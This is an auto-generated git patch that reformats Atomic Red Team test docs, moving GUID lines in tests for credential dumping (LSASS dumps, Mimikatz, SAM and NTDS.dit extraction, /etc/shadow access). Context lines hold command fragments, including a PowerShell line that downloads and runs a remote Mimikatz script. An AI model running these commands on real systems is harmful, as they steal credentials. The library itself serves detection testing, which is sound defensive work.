From 36d49de4c8b00bf36054294b4a1fcbab3917d7c5 Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 17:04:33 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.md | 96 ++++++++++------- atomics/T1003.002/T1003.002.md | 32 +++--- atomics/T1003.003/T1003.003.md | 48 +++++---- atomics/T1003.004/T1003.004.md | 8 +- atomics/T1003.006/T1003.006.md | 8 +- atomics/T1003.007/T1003.007.md | 16 +-- atomics/T1003.008/T1003.008.md | 16 +-- atomics/T1003/T1003.md | 16 +-- atomics/T1006/T1006.md | 8 +- atomics/T1007/T1007.md | 16 +-- atomics/T1010/T1010.md | 8 +- atomics/T1012/T1012.md | 8 +- atomics/T1014/T1014.md | 24 +++-- atomics/T1016/T1016.md | 64 ++++++----- atomics/T1018/T1018.md | 88 +++++++++------ atomics/T1020/T1020.md | 8 +- atomics/T1021.001/T1021.001.md | 16 +-- atomics/T1021.002/T1021.002.md | 32 +++--- atomics/T1021.003/T1021.003.md | 8 +- atomics/T1021.006/T1021.006.md | 24 +++-- atomics/T1027.001/T1027.001.md | 8 +- atomics/T1027.002/T1027.002.md | 32 +++--- atomics/T1027.004/T1027.004.md | 16 +-- atomics/T1027/T1027.md | 48 +++++---- atomics/T1030/T1030.md | 8 +- atomics/T1033/T1033.md | 24 +++-- atomics/T1036.003/T1036.003.md | 72 ++++++++----- atomics/T1036.004/T1036.004.md | 16 +-- atomics/T1036.005/T1036.005.md | 8 +- atomics/T1036.006/T1036.006.md | 8 +- atomics/T1036/T1036.md | 8 +- atomics/T1037.001/T1037.001.md | 8 +- atomics/T1037.002/T1037.002.md | 8 +- atomics/T1037.004/T1037.004.md | 24 +++-- atomics/T1037.005/T1037.005.md | 8 +- atomics/T1040/T1040.md | 32 +++--- atomics/T1046/T1046.md | 32 +++--- atomics/T1047/T1047.md | 64 ++++++----- atomics/T1048.003/T1048.003.md | 40 ++++--- atomics/T1048/T1048.md | 16 +-- atomics/T1049/T1049.md | 32 +++--- atomics/T1053.001/T1053.001.md | 8 +- atomics/T1053.002/T1053.002.md | 8 +- atomics/T1053.003/T1053.003.md | 24 +++-- atomics/T1053.004/T1053.004.md | 8 +- atomics/T1053.005/T1053.005.md | 48 +++++---- atomics/T1053.006/T1053.006.md | 8 +- 
atomics/T1053.007/T1053.007.md | 16 +-- atomics/T1055.001/T1055.001.md | 8 +- atomics/T1055.004/T1055.004.md | 8 +- atomics/T1055.012/T1055.012.md | 16 +-- atomics/T1055/T1055.md | 16 +-- atomics/T1056.001/T1056.001.md | 16 +-- atomics/T1056.002/T1056.002.md | 16 +-- atomics/T1056.004/T1056.004.md | 8 +- atomics/T1057/T1057.md | 16 +-- atomics/T1059.001/T1059.001.md | 144 +++++++++++++++---------- atomics/T1059.002/T1059.002.md | 8 +- atomics/T1059.003/T1059.003.md | 16 +-- atomics/T1059.004/T1059.004.md | 16 +-- atomics/T1059.005/T1059.005.md | 24 +++-- atomics/T1059.006/T1059.006.md | 24 +++-- atomics/T1069.001/T1069.001.md | 24 +++-- atomics/T1069.002/T1069.002.md | 64 ++++++----- atomics/T1070.001/T1070.001.md | 24 +++-- atomics/T1070.002/T1070.002.md | 24 +++-- atomics/T1070.003/T1070.003.md | 88 +++++++++------ atomics/T1070.004/T1070.004.md | 80 ++++++++------ atomics/T1070.005/T1070.005.md | 24 +++-- atomics/T1070.006/T1070.006.md | 64 ++++++----- atomics/T1070/T1070.md | 8 +- atomics/T1071.001/T1071.001.md | 24 +++-- atomics/T1071.004/T1071.004.md | 32 +++--- atomics/T1072/T1072.md | 8 +- atomics/T1074.001/T1074.001.md | 24 +++-- atomics/T1078.001/T1078.001.md | 8 +- atomics/T1078.003/T1078.003.md | 8 +- atomics/T1082/T1082.md | 88 +++++++++------ atomics/T1083/T1083.md | 32 +++--- atomics/T1087.001/T1087.001.md | 88 +++++++++------ atomics/T1087.002/T1087.002.md | 80 ++++++++------ atomics/T1090.001/T1090.001.md | 24 +++-- atomics/T1095/T1095.md | 24 +++-- atomics/T1098.004/T1098.004.md | 8 +- atomics/T1098/T1098.md | 16 +-- atomics/T1105/T1105.md | 112 +++++++++++-------- atomics/T1106/T1106.md | 8 +- atomics/T1110.001/T1110.001.md | 16 +-- atomics/T1110.002/T1110.002.md | 8 +- atomics/T1110.003/T1110.003.md | 24 +++-- atomics/T1110.004/T1110.004.md | 16 +-- atomics/T1112/T1112.md | 48 +++++---- atomics/T1113/T1113.md | 40 ++++--- atomics/T1114.001/T1114.001.md | 8 +- atomics/T1115/T1115.md | 32 +++--- atomics/T1119/T1119.md | 32 +++--- 
atomics/T1120/T1120.md | 8 +- atomics/T1123/T1123.md | 8 +- atomics/T1124/T1124.md | 16 +-- atomics/T1127.001/T1127.001.md | 16 +-- atomics/T1132.001/T1132.001.md | 8 +- atomics/T1133/T1133.md | 8 +- atomics/T1134.001/T1134.001.md | 16 +-- atomics/T1134.004/T1134.004.md | 40 ++++--- atomics/T1135/T1135.md | 48 +++++---- atomics/T1136.001/T1136.001.md | 48 +++++---- atomics/T1136.002/T1136.002.md | 24 +++-- atomics/T1137.002/T1137.002.md | 8 +- atomics/T1137.004/T1137.004.md | 8 +- atomics/T1137/T1137.md | 8 +- atomics/T1140/T1140.md | 16 +-- atomics/T1176/T1176.md | 32 +++--- atomics/T1197/T1197.md | 32 +++--- atomics/T1201/T1201.md | 56 ++++++---- atomics/T1202/T1202.md | 24 +++-- atomics/T1204.002/T1204.002.md | 64 ++++++----- atomics/T1207/T1207.md | 8 +- atomics/T1216.001/T1216.001.md | 8 +- atomics/T1216/T1216.md | 16 +-- atomics/T1217/T1217.md | 56 ++++++---- atomics/T1218.001/T1218.001.md | 56 ++++++---- atomics/T1218.002/T1218.002.md | 8 +- atomics/T1218.003/T1218.003.md | 16 +-- atomics/T1218.004/T1218.004.md | 64 ++++++----- atomics/T1218.005/T1218.005.md | 72 ++++++++----- atomics/T1218.007/T1218.007.md | 24 +++-- atomics/T1218.008/T1218.008.md | 8 +- atomics/T1218.009/T1218.009.md | 16 +-- atomics/T1218.010/T1218.010.md | 40 ++++--- atomics/T1218.011/T1218.011.md | 64 ++++++----- atomics/T1218/T1218.md | 64 ++++++----- atomics/T1219/T1219.md | 24 +++-- atomics/T1220/T1220.md | 32 +++--- atomics/T1221/T1221.md | 8 +- atomics/T1222.001/T1222.001.md | 40 ++++--- atomics/T1222.002/T1222.002.md | 72 ++++++++----- atomics/T1482/T1482.md | 40 ++++--- atomics/T1485/T1485.md | 16 +-- atomics/T1486/T1486.md | 32 +++--- atomics/T1489/T1489.md | 24 +++-- atomics/T1490/T1490.md | 56 ++++++---- atomics/T1491.001/T1491.001.md | 8 +- atomics/T1496/T1496.md | 8 +- atomics/T1497.001/T1497.001.md | 24 +++-- atomics/T1505.002/T1505.002.md | 8 +- atomics/T1505.003/T1505.003.md | 8 +- atomics/T1518.001/T1518.001.md | 48 +++++---- atomics/T1518/T1518.md | 24 +++-- 
atomics/T1529/T1529.md | 72 ++++++++----- atomics/T1531/T1531.md | 24 +++-- atomics/T1543.001/T1543.001.md | 8 +- atomics/T1543.002/T1543.002.md | 16 +-- atomics/T1543.003/T1543.003.md | 24 +++-- atomics/T1543.004/T1543.004.md | 8 +- atomics/T1546.001/T1546.001.md | 8 +- atomics/T1546.002/T1546.002.md | 8 +- atomics/T1546.003/T1546.003.md | 8 +- atomics/T1546.004/T1546.004.md | 16 +-- atomics/T1546.005/T1546.005.md | 8 +- atomics/T1546.007/T1546.007.md | 8 +- atomics/T1546.008/T1546.008.md | 16 +-- atomics/T1546.010/T1546.010.md | 8 +- atomics/T1546.011/T1546.011.md | 24 +++-- atomics/T1546.012/T1546.012.md | 16 +-- atomics/T1546.013/T1546.013.md | 8 +- atomics/T1546.014/T1546.014.md | 8 +- atomics/T1547.001/T1547.001.md | 56 ++++++---- atomics/T1547.004/T1547.004.md | 24 +++-- atomics/T1547.005/T1547.005.md | 8 +- atomics/T1547.006/T1547.006.md | 8 +- atomics/T1547.007/T1547.007.md | 16 +-- atomics/T1547.009/T1547.009.md | 16 +-- atomics/T1547.010/T1547.010.md | 8 +- atomics/T1547.011/T1547.011.md | 8 +- atomics/T1548.001/T1548.001.md | 24 +++-- atomics/T1548.002/T1548.002.md | 72 ++++++++----- atomics/T1548.003/T1548.003.md | 24 +++-- atomics/T1550.002/T1550.002.md | 16 +-- atomics/T1550.003/T1550.003.md | 8 +- atomics/T1552.001/T1552.001.md | 40 ++++--- atomics/T1552.002/T1552.002.md | 16 +-- atomics/T1552.003/T1552.003.md | 8 +- atomics/T1552.004/T1552.004.md | 32 +++--- atomics/T1552.006/T1552.006.md | 16 +-- atomics/T1552.007/T1552.007.md | 16 +-- atomics/T1553.001/T1553.001.md | 8 +- atomics/T1553.004/T1553.004.md | 40 ++++--- atomics/T1553.005/T1553.005.md | 16 +-- atomics/T1555.001/T1555.001.md | 8 +- atomics/T1555.003/T1555.003.md | 24 +++-- atomics/T1555/T1555.md | 24 +++-- atomics/T1556.002/T1556.002.md | 8 +- atomics/T1558.001/T1558.001.md | 8 +- atomics/T1558.003/T1558.003.md | 8 +- atomics/T1559.002/T1559.002.md | 24 +++-- atomics/T1560.001/T1560.001.md | 64 ++++++----- atomics/T1560.002/T1560.002.md | 32 +++--- atomics/T1560/T1560.md | 8 +- 
atomics/T1562.001/T1562.001.md | 192 ++++++++++++++++++++------------- atomics/T1562.002/T1562.002.md | 32 +++--- atomics/T1562.003/T1562.003.md | 16 +-- atomics/T1562.004/T1562.004.md | 56 ++++++---- atomics/T1562.006/T1562.006.md | 16 +-- atomics/T1563.002/T1563.002.md | 8 +- atomics/T1564.001/T1564.001.md | 56 ++++++---- atomics/T1564.002/T1564.002.md | 16 +-- atomics/T1564.003/T1564.003.md | 8 +- atomics/T1564.004/T1564.004.md | 32 +++--- atomics/T1564/T1564.md | 24 +++-- atomics/T1566.001/T1566.001.md | 16 +-- atomics/T1569.001/T1569.001.md | 8 +- atomics/T1569.002/T1569.002.md | 16 +-- atomics/T1571/T1571.md | 16 +-- atomics/T1573/T1573.md | 8 +- atomics/T1574.001/T1574.001.md | 8 +- atomics/T1574.002/T1574.002.md | 8 +- atomics/T1574.006/T1574.006.md | 16 +-- atomics/T1574.009/T1574.009.md | 8 +- atomics/T1574.011/T1574.011.md | 16 +-- atomics/T1574.012/T1574.012.md | 24 +++-- atomics/T1609/T1609.md | 8 +- atomics/T1610/T1610.md | 8 +- atomics/T1611/T1611.md | 8 +- 223 files changed, 3625 insertions(+), 2175 deletions(-)
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 9869cc02..024dd2aa 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -54,9 +54,6 @@ The following SSPs can be used to access credentials:
## Atomic Test #1 - Windows Credential Editor - -auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed - Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file. @@ -64,9 +61,14 @@ Upon successful execution, you should see a file with user passwords/hashes at % If you see no output it is likely that execution was blocked by Anti-Virus. If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first. + **Supported Platforms:** Windows +**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed + + + #### Inputs: @@ -117,18 +119,20 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump - -auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 + + + #### Inputs: @@ -174,15 +178,17 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll - -auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be + + + @@ -206,18 +212,20 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking - -auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d + + + #### Inputs: @@ -260,14 +268,16 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager - -auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. + **Supported Platforms:** Windows +**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607 + + + #### Run it with these steps! @@ -292,14 +302,16 @@ Manager and administrative permissions.
## Atomic Test #6 - Offline Credential Theft With Mimikatz - -auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 - The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. + **Supported Platforms:** Windows +**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023 + + + #### Inputs: @@ -358,17 +370,19 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
## Atomic Test #7 - LSASS read with pypykatz - -auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8 - Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple useranames and passwords/hashes to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8 + + + @@ -421,15 +435,17 @@ pip install pypykatz
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1 - -auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781 - The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781 + + + @@ -454,18 +470,20 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump - -auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b + + + #### Inputs: @@ -510,16 +528,18 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #10 - Powershell Mimikatz - -auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc - Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" + **Supported Platforms:** Windows +**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc + + + #### Inputs: @@ -544,14 +564,16 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe - -auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 - This test uses the technique describe in this tweet (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass + **Supported Platforms:** Windows +**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 + + + #### Inputs: @@ -597,17 +619,19 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs - -auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697 + + + #### Inputs: diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 73f20f13..ad162a55 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -36,16 +36,18 @@ Notes:
## Atomic Test #1 - Registry dump of SAM, creds, and secrets - -auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44 - Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44 + + + @@ -73,13 +75,15 @@ del %temp%\security >nul 2> nul
## Atomic Test #2 - Registry parse with pypykatz - -auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 - Parses registry hives to obtain stored credentials + **Supported Platforms:** Windows +**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263 + + + @@ -132,14 +136,16 @@ pip install pypykatz
## Atomic Test #3 - esentutl.exe SAM copy - -auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480 - Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. + **Supported Platforms:** Windows +**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480 + + + #### Inputs: @@ -170,13 +176,15 @@ del #{copy_dest}\#{file_name} >nul 2>&1
## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames - -auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 - Executes a hashdump by reading the hasshes from the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193 + + + diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index c89af84f..a82206f8 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -30,15 +30,17 @@ The following tools and techniques can be used to enumerate the NTDS file and th
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin - -auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f + + + #### Inputs: @@ -75,9 +77,6 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy - -auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. @@ -85,9 +84,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. + **Supported Platforms:** Windows +**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03 + + + #### Inputs: @@ -151,9 +155,6 @@ mkdir #{extract_path}
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil - -auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability @@ -161,9 +162,14 @@ uses the "IFM" or "Install From Media" backup functionality that allows Active D subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723 + + + #### Inputs: @@ -205,15 +211,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #4 - Create Volume Shadow Copy with WMI - -auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da + + + #### Inputs: @@ -250,15 +258,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #5 - Create Volume Shadow Copy with Powershell - -auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24 + + + #### Inputs: @@ -283,15 +293,17 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
## Atomic Test #6 - Create Symlink to Volume Shadow Copy - -auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702 + + + #### Inputs: diff --git a/atomics/T1003.004/T1003.004.md b/atomics/T1003.004/T1003.004.md index 05973de3..15260a63 100644 --- a/atomics/T1003.004/T1003.004.md +++ b/atomics/T1003.004/T1003.004.md @@ -12,16 +12,18 @@
## Atomic Test #1 - Dumping LSA Secrets - -auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f - Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc. + **Supported Platforms:** Windows +**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f + + + #### Inputs: diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md index c6708587..c9efc3ad 100644 --- a/atomics/T1003.006/T1003.006.md +++ b/atomics/T1003.006/T1003.006.md @@ -14,16 +14,18 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
## Atomic Test #1 - DCSync - -auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e - Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729) + **Supported Platforms:** Windows +**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e + + + #### Inputs: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index 99420fb6..d2d5875d 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -14,14 +14,16 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
## Atomic Test #1 - Dump individual process memory with sh (Local) - -auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 - Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. + **Supported Platforms:** Linux +**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80 + + + #### Inputs: @@ -73,14 +75,16 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa
## Atomic Test #2 - Dump individual process memory with Python (Local) - -auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 - Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. + **Supported Platforms:** Linux +**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63 + + + #### Inputs: diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md index fb75bbaa..496d6d4c 100644 --- a/atomics/T1003.008/T1003.008.md +++ b/atomics/T1003.008/T1003.008.md @@ -15,13 +15,15 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
## Atomic Test #1 - Access /etc/shadow (Local) - -auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 - /etc/shadow file is accessed in Linux environments + **Supported Platforms:** Linux +**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235 + + + #### Inputs: @@ -51,13 +53,15 @@ rm -f #{output_file}
## Atomic Test #2 - Access /etc/passwd (Local) - -auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d - /etc/passwd file is accessed in Linux environments + **Supported Platforms:** Linux +**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d + + + #### Inputs: diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 8b9193ca..f7c73c92 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -15,9 +15,6 @@ Several of the tools mentioned in associated sub-techniques may be used by both
## Atomic Test #1 - Gsecdump - -auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9 - Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's following by two 32 characters hashes. @@ -26,9 +23,14 @@ If you see output that says "compat: error: failed to create child process", exe You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first. + **Supported Platforms:** Windows +**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9 + + + #### Inputs: @@ -72,16 +74,18 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
## Atomic Test #2 - Credential Dumping with NPPSpy - -auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 - Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy + **Supported Platforms:** Windows +**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 + + + diff --git a/atomics/T1006/T1006.md b/atomics/T1006/T1006.md index 203a2b06..19a34276 100644 --- a/atomics/T1006/T1006.md +++ b/atomics/T1006/T1006.md @@ -12,9 +12,6 @@ Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Cit
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell) - -auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b - This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. @@ -24,9 +21,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti 00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS ``` + **Supported Platforms:** Windows +**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b + + + #### Inputs: diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index 7cb3c441..faff45d6 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -12,15 +12,17 @@
## Atomic Test #1 - System Service Discovery - -auto_generated_guid: 89676ba1-b1f8-47ee-b940-2e1a113ebc71 - Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71 + + + @@ -42,15 +44,17 @@ sc query state= all
